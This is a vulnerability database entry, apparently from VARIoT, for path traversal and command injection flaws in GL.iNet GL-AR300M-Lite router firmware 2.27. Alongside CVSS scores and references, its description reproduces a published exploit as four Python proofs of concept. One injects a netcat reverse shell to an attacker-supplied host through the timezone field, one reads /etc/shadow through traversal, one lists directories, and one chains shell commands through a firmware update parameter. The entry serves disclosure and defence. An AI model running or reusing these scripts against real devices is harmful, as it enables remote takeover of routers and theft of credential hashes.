VAR-201903-0452

Vulnerability from variot - Updated: 2024-11-23 21:52

Directory traversal vulnerability in storage_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to have unspecified impact via directory traversal sequences. GL.iNet GL-AR300M-Lite The device firmware contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal

Date: 15/1/2019

Exploit Author: Pasquale Turi aka boombyte

Vendor Homepage: https://www.gl-inet.com/

Software Link: https://www.gl-inet.com/products/gl-ar300m/

Version: Firmware version 2.27

CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275

CVE-2019-6272 PoC (Command injection):

import requests

rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'nc '+lhost+' '+lport+' -e /bin/ash'})

CVE-2019-6273 (Arbitrary file download) PoC:

import requests

rhost='RHOST' password='PASSWORD' file_path='/etc/shadow' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) print r4.text

CVE-2019-6274 (Path Trasversal) PoC:

import requests

rhost='RHOST' password='PASSWORD' path='/' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) print r4.text

CVE-2019-6275 (Another command injection):

import requests

rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) print r4.text

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201903-0452",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "gl-ar300m-lite",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "gl inet",
        "version": "2.27"
      },
      {
        "model": "gl-ar300m-lite",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "gl ar300m lite",
        "version": "2.27"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:gl-inet:gl-ar300m-lite_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pasquale Turi",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "151207"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2019-6274",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2019-6274",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2019-37927",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "VHN-157709",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2019-6274",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-6274",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-6274",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-37927",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201901-729",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-157709",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in storage_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to have unspecified impact via directory traversal sequences. GL.iNet GL-AR300M-Lite The device firmware contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal\n# Date: 15/1/2019\n# Exploit Author: Pasquale Turi aka boombyte\n# Vendor Homepage: https://www.gl-inet.com/\n# Software Link: https://www.gl-inet.com/products/gl-ar300m/\n# Version: Firmware version 2.27\n# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275\n\n\n#CVE-2019-6272 PoC (Command injection):\n\nimport requests\n\nrhost=\u0027RHOST\u0027\nlhost=\u0027LHOST\u0027 \nlport =\u0027LPORT\u0027\npassword=\u0027PASSWORD\u0027\nr=requests.get(\u0027http://\u0027+rhost+\u0027/login.html\u0027)\ncookie=r.cookies\nr2=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi?action=checklogin\u0027,cookies=cookie)\nheader={\u0027X-CSRF-TOKEN\u0027:r2.text[13:45]}\nr3=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r2.cookies,data={\u0027action\u0027:\u0027login\u0027,\u0027password\u0027:password,\u0027code\u0027:\u0027\u0027})\nheader={\u0027X-CSRF-TOKEN\u0027:r3.text[31:63]}\nr4=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r3.cookies,data={\u0027action\u0027:\u0027settimezone\u0027,\u0027timezone\u0027:\u0027`nc \u0027+lhost+\u0027 \u0027+lport+\u0027 -e /bin/ash`\u0027})\n\n\n#CVE-2019-6273 (Arbitrary file download) PoC:\n\nimport requests\n\nrhost=\u0027RHOST\u0027\npassword=\u0027PASSWORD\u0027\nfile_path=\u0027/etc/shadow\u0027\nr=requests.get(\u0027http://\u0027+rhost+\u0027/login.html\u0027)\ncookie=r.cookies\nr2=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi?action=checklogin\u0027,cookies=cookie)\nheader={\u0027X-CSRF-TOKEN\u0027:r2.text[13:45]}\nr3=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r2.cookies,data={\u0027action\u0027:\u0027login\u0027,\u0027password\u0027:password,\u0027code\u0027:\u0027\u0027})\nheader={\u0027X-CSRF-TOKEN\u0027:r3.text[31:63]}\nr4=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/download_file?/mnt/..\u0027+file_path,headers=header,cookies=r3.cookies)\nprint r4.text\n\n\n#CVE-2019-6274 (Path Trasversal) PoC:\n\nimport requests\n\nrhost=\u0027RHOST\u0027\npassword=\u0027PASSWORD\u0027\npath=\u0027/\u0027\nr=requests.get(\u0027http://\u0027+rhost+\u0027/login.html\u0027)\ncookie=r.cookies\nr2=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi?action=checklogin\u0027,cookies=cookie)\nheader={\u0027X-CSRF-TOKEN\u0027:r2.text[13:45]}\nr3=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r2.cookies,data={\u0027action\u0027:\u0027login\u0027,\u0027password\u0027:password,\u0027code\u0027:\u0027\u0027})\nheader={\u0027X-CSRF-TOKEN\u0027:r3.text[31:63]}\nr4=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/storage_cgi?id=2\u0026pwd=\u0027+path,headers=header,cookies=r3.cookies)\nprint r4.text\n\n\n#CVE-2019-6275 (Another command injection):\n\nimport requests\n\nrhost=\u0027RHOST\u0027\nlhost=\u0027LHOST\u0027 \nlport =\u0027LPORT\u0027\npassword=\u0027PASSWORD\u0027\nr=requests.get(\u0027http://\u0027+rhost+\u0027/login.html\u0027)\ncookie=r.cookies\nr2=requests.get(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi?action=checklogin\u0027,cookies=cookie)\nheader={\u0027X-CSRF-TOKEN\u0027:r2.text[13:45]}\nr3=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r2.cookies,data={\u0027action\u0027:\u0027login\u0027,\u0027password\u0027:password,\u0027code\u0027:\u0027\u0027})\nheader={\u0027X-CSRF-TOKEN\u0027:r3.text[31:63]}\nr4=requests.post(\u0027http://\u0027+rhost+\u0027/cgi-bin/firmware_cgi?action=setautoupdate\u0026auto_update=off\u0026update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\\\u0027%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23\u0026_=1547223055153 \u0027,headers=header,cookies=r3.cookies,)\nprint r4.text\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "PACKETSTORM",
        "id": "151207"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-6274",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "151207",
        "trust": 2.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "46179",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "PACKETSTORM",
        "id": "151207"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "id": "VAR-201903-0452",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:27.531000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "GL-AR300M",
        "trust": 0.8,
        "url": "https://www.gl-inet.com/products/gl-ar300m/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://packetstormsecurity.com/files/151207/gl-ar300m-lite-2.2.7-command-injection-directory-traversal.html"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6274"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/46179/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6274"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6275"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/firmware_cgi?action=setautoupdate\u0026auto_update=off\u0026update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\\\u0027%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23\u0026_=1547223055153"
      },
      {
        "trust": 0.1,
        "url": "https://www.gl-inet.com/"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/login_cgi?action=checklogin\u0027,cookies=cookie)"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r2.cookies,data={\u0027action\u0027:\u0027login\u0027,\u0027password\u0027:password,\u0027code\u0027:\u0027\u0027})"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/login_cgi\u0027,headers=header,cookies=r3.cookies,data={\u0027action\u0027:\u0027settimezone\u0027,\u0027timezone\u0027:\u0027`nc"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/download_file?/mnt/..\u0027+file_path,headers=header,cookies=r3.cookies)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6273"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/cgi-bin/storage_cgi?id=2\u0026pwd=\u0027+path,headers=header,cookies=r3.cookies)"
      },
      {
        "trust": 0.1,
        "url": "https://www.gl-inet.com/products/gl-ar300m/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6272"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027+rhost+\u0027/login.html\u0027)"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "PACKETSTORM",
        "id": "151207"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "db": "PACKETSTORM",
        "id": "151207"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "date": "2019-03-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "date": "2019-04-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "date": "2019-01-16T23:32:22",
        "db": "PACKETSTORM",
        "id": "151207"
      },
      {
        "date": "2019-01-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "date": "2019-03-21T16:01:07.843000",
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-29T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "date": "2019-03-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-157709"
      },
      {
        "date": "2019-04-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-002794"
      },
      {
        "date": "2019-04-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      },
      {
        "date": "2024-11-21T04:46:21.230000",
        "db": "NVD",
        "id": "CVE-2019-6274"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "GL-AR300M-Lite Path Traversal Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-37927"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-729"
      }
    ],
    "trust": 0.6
  }
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…